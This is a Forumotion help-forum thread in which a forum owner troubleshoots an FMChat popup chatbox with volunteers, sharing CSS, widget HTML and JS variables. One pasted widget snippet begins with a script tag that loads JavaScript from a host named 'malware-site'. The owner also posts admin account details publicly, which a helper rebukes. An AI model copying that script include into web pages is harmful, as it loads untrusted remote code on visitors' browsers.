The forum of the forums
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Chatbox popup problem

5 posters

Go down

Solved Chatbox popup problem

Post by Ivy_2819 November 30th 2012, 12:49 am

Hello,
The last time I tried to install the FM-chat popup, it didn't comes out right.

Chatbox popup problem Screen17

I believe I have done correctly all the steps in this tutorial : https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat

My chatbox and forum widget are activated.

My forum link: www.steven.forumvi.com
version: phpbb3


Last edited by Ivy_2819 on December 1st 2012, 7:38 pm; edited 1 time in total
Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Asriel November 30th 2012, 3:50 am

Code:
    /*FMChat Design*/
    .chatbase { /*This can be edited to your liking - (the button)*/
      position: fixed;
      bottom: 2px;
      right: 15px;
      background: #56A0D3;
      border: 2px solid #7BB92B;
      width: 75px;
      height: 20px;
      border-radius: 5px;
      text-align: center !important;
      cursor: pointer;
      color: #ffffff;
    }

    .chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
      border-color: #D30C3F;
      color: #000000;
    }

    #chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
      border: 2px solid #7BB92B;
      width: 65%;
      position: fixed;
      right: 15px;
      bottom: 27px;
      height: 50%;
      border-radius: 5px;
      z-index: 1000;
    }
Asriel
Asriel
Forumember

Male Posts : 585
Reputation : 32
Language : English, Russian, Ukrainian
Location : St. Somewhere

http://www.worldofmutants.forumotion.com

Back to top Go down

Solved Re: Chatbox popup problem

Post by Ivy_2819 November 30th 2012, 5:24 am

Rideem3 wrote:You didn't add the CSS.

Asriel wrote:
Code:
    /*FMChat Design*/
    .chatbase { /*This can be edited to your liking - (the button)*/
      position: fixed;
      bottom: 2px;
      right: 15px;
      background: #56A0D3;
      border: 2px solid #7BB92B;
      width: 75px;
      height: 20px;
      border-radius: 5px;
      text-align: center !important;
      cursor: pointer;
      color: #ffffff;
    }

    .chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
      border-color: #D30C3F;
      color: #000000;
    }

    #chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
      border: 2px solid #7BB92B;
      width: 65%;
      position: fixed;
      right: 15px;
      bottom: 27px;
      height: 50%;
      border-radius: 5px;
      z-index: 1000;
    }

No, I already add the CSS. But it still didn't work Sad
Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Kaizer Lee November 30th 2012, 5:30 am

Chatbox popup problem DEgmd

Please dispatch of the following problems stated there first Smile
Kaizer Lee
Kaizer Lee
Active Poster

Female Posts : 1064
Reputation : 54
Language : English, Tagalog, Spanish and Chinese
Location : Philippines

http://www.medievalchaos.net/forum

Back to top Go down

Solved Re: Chatbox popup problem

Post by Kaizer Lee November 30th 2012, 1:23 pm

In case you've got no idea where the widget is located, I'll post it here:

ACP < Modules < Forum Widgets Management < Create a New Widget (Make sure you enabled Widgets) < Save.
Kaizer Lee
Kaizer Lee
Active Poster

Female Posts : 1064
Reputation : 54
Language : English, Tagalog, Spanish and Chinese
Location : Philippines

http://www.medievalchaos.net/forum

Back to top Go down

Solved Re: Chatbox popup problem

Post by Ivy_2819 November 30th 2012, 6:41 pm

This is my Widget. The forum widget is activated , I already put it on the left side (180)
Chatbox popup problem Screen19

My code in the widget
Code:
<div id="FMChatBase" class="chatbase" onclick="openClose()"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>

This is a part of CSS that contend the FMChat CSS code. I don't know much about scripts, codes,...Is there anything wrong with this ?
Chatbox popup problem Screen20

My CSS code:
Code:
/*FMChat Design*/
        .chatbase { /*This can be edited to your liking - (the button)*/
          position: fixed;
          bottom: 2px;
          right: 15px;
          background: #56A0D3;
          border: 2px solid #7BB92B;
          width: 75px;
          height: 20px;
          border-radius: 5px;
          text-align: center !important;
          cursor: pointer;
          color: #ffffff;
        }

        .chatbase:hover { /*This can be edited to your liking - (hovering over the button)*/
          border-color: #D30C3F;
          color: #000000;
        }

        #chat { /*This can be edited to your liking - (box surrounding the chatbox)*/
          border: 2px solid #7BB92B;
          width: 65%;
          position: fixed;
          right: 15px;
          bottom: 27px;
          height: 50%;
          border-radius: 5px;
          z-index: 999;
        }

And this is my JS, I don't know If I have done anything wrong :/
I didn't change the "normal"
I leave the duration blank ""
I changed the MOD sign in to "Chat MOD"
I changed the title to "FMChat"
I changed the tiltle URL in to "WWW.STEVEN.FORUMVI.COM/CHATBOX" (I think this was the problem)
Chatbox popup problem Screen21

My JS code:
Code:
/*FMChat Variables*/
    var fmchat_toggle = "normal"; //Toggle Type
    var fmchat_toggle_duration = ""; //Toggle Duration
    var fmchat_mod_sign = "CHAT MOD"; //FMChat Mod Sign
    var fmchat_title = "FMChat"; //FMChat Title
    var fmchat_title_url = "WWW.STEVEN.FORUMVI.COM/CHATBOX"; //FMChat Title URL

I also set it as "In all pages"

Could you find the problem please Sad
Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Sanket November 30th 2012, 6:47 pm

Chatbox popup problem Screen19

In the above image. First click on this Chatbox popup problem Desact-html. Then return to the original window & then add the code.
See if that changes anything.
Sanket
Sanket
ForumGuru

Male Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai

Back to top Go down

Solved Re: Chatbox popup problem

Post by Ivy_2819 November 30th 2012, 6:58 pm

Sanket wrote:Chatbox popup problem Screen19

In the above image. First click on this Chatbox popup problem Desact-html. Then return to the original window & then add the code.
See if that changes anything.

No, didn't change anything with forum widget activated :/

Oh, and also, I've deactivated the forum widget since I still can't figure out what's the problem (activated it while having this problem making my forum look weird Confused ) , I'll activate it again if there's new solution.
Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Sanket November 30th 2012, 7:27 pm

https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat#690155
Thats the code in the widget, what code did you add in yours?
Sanket
Sanket
ForumGuru

Male Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai

Back to top Go down

Solved Re: Chatbox popup problem

Post by Ivy_2819 November 30th 2012, 7:48 pm

Ivy_2819 wrote:This is my Widget. The forum widget is activated , I already put it on the left side (180)
Chatbox popup problem Screen19

My code in the widget
Code:
<div id="FMChatBase" class="chatbase" onclick="openClose()"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>

As I said above. At first I copied and pasted the code on the first post of this link https://help.forumotion.com/t88458-how-to-create-a-pop-up-chat-box-fmchat Which is :
Code:
<script type="text/javascript" src="http://forum.malware-site.www/14000.js"></script><div id="FMChatBase" class="chatbase" onclick="openClose(); autoLog();"><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" height="100%" width="100%"></iframe></div>
And then when I scroll down, I saw the update of the Widget html code, I copied and pasted the latest update of the code, which is :

Code:
<script type="text/javascript" src="http://fmquery.forumotion.com/h1-fmchatjs"></script><div id="FMChatBase" class="chatbase" onclick="openClose()" ><span style="font-weight: bold; line-height: 2em; font-size: 11px;">ChatBox</span></div><div id="chat" style="display: none;"><iframe id="FMChat" name="FMChat" onload="FMChatLoad();" style="border: none; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;" src="/chatbox" width="100%" height="100%"></iframe></div>
Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Sanket November 30th 2012, 7:51 pm

Can you provide me with a test admin account for that forum, wherever you are installing this?
Sanket
Sanket
ForumGuru

Male Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai

Back to top Go down

Solved Re: Chatbox popup problem

Post by SLGray November 30th 2012, 7:53 pm

All the information in the first post of the tutorial is up to date.


Chatbox popup problem Slgray10

When your topic has been solved, ensure you mark the topic solved.
Never post your email in public.
SLGray
SLGray
Administrator
Administrator

Male Posts : 51489
Reputation : 3519
Language : English
Location : United States

https://forumsclub.com/gc/128-link-directory/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Ivy_2819 November 30th 2012, 8:04 pm

Sanket wrote:Can you provide me with a test admin account for that forum, wherever you are installing this?

Okay, but I don't have any email left to do that, could you provide me an email first?

slg wrote:All the information in the first post of the tutorial is up to date.

Oh, so it's all the same right? Thank you.
Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Sanket November 30th 2012, 8:08 pm

Well i am sorry I don't want to register on the forum with my email address.

You can create one or send me your account details with the password already changed. Once, i use it & am done with it. You can change it to your original password.
Sanket
Sanket
ForumGuru

Male Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai

Back to top Go down

Solved Re: Chatbox popup problem

Post by Ivy_2819 November 30th 2012, 9:24 pm

Sanket wrote:Well i am sorry I don't want to register on the forum with my email address.

You can create one or send me your account details with the password already changed. Once, i use it & am done with it. You can change it to your original password.

Here you go,
ID: Xiao dong
password: Password Removed
link: www.steven.forumvi.com
Admin Panel: http://steven.forumvi.com/admin/index.forum?tid=#Removed

hope you can find the solution Smile Thank you

Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by Sanket December 1st 2012, 2:39 pm

Ivy_2819 wrote:
Here you go,
ID: Xiao dong
password: Password Removed
link: www.steven.forumvi.com
Admin Panel: http://steven.forumvi.com/admin/index.forum?tid=#Removed

hope you can find the solution Smile Thank you


Firstly, never ever post a password to any account on a public forum. Its not safe. You posted a admin account password, any person here could have misused it. So please don't do this in the future for your & your forum's safety.
You should have PM'ed me these details.


I went to your forum, there seems to be nothing installed in the forum widgets management. Please install everything according to the tutorial, I will only come & check what could be wrong. I am not installing it from scratch.
Sanket
Sanket
ForumGuru

Male Posts : 48766
Reputation : 2830
Language : English
Location : Mumbai

Back to top Go down

Solved Re: Chatbox popup problem

Post by Ivy_2819 December 1st 2012, 7:35 pm

I already mark the topic as complete, cause I don't need the popup anymore, it's too complicated, me and some other admins decided to leave the chatbox this way Smile Thank you and also sorry for bothering you guys these days
Ivy_2819
Ivy_2819
Forumember

Female Posts : 129
Reputation : 3
Language : Vietnamese and English
Location : Houston, TX, USA

http://steven.forumvi.com/

Back to top Go down

Solved Re: Chatbox popup problem

Post by SLGray December 1st 2012, 7:43 pm

It is ok.
Topic Solved & Locked


Chatbox popup problem Slgray10

When your topic has been solved, ensure you mark the topic solved.
Never post your email in public.
SLGray
SLGray
Administrator
Administrator

Male Posts : 51489
Reputation : 3519
Language : English
Location : United States

https://forumsclub.com/gc/128-link-directory/

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum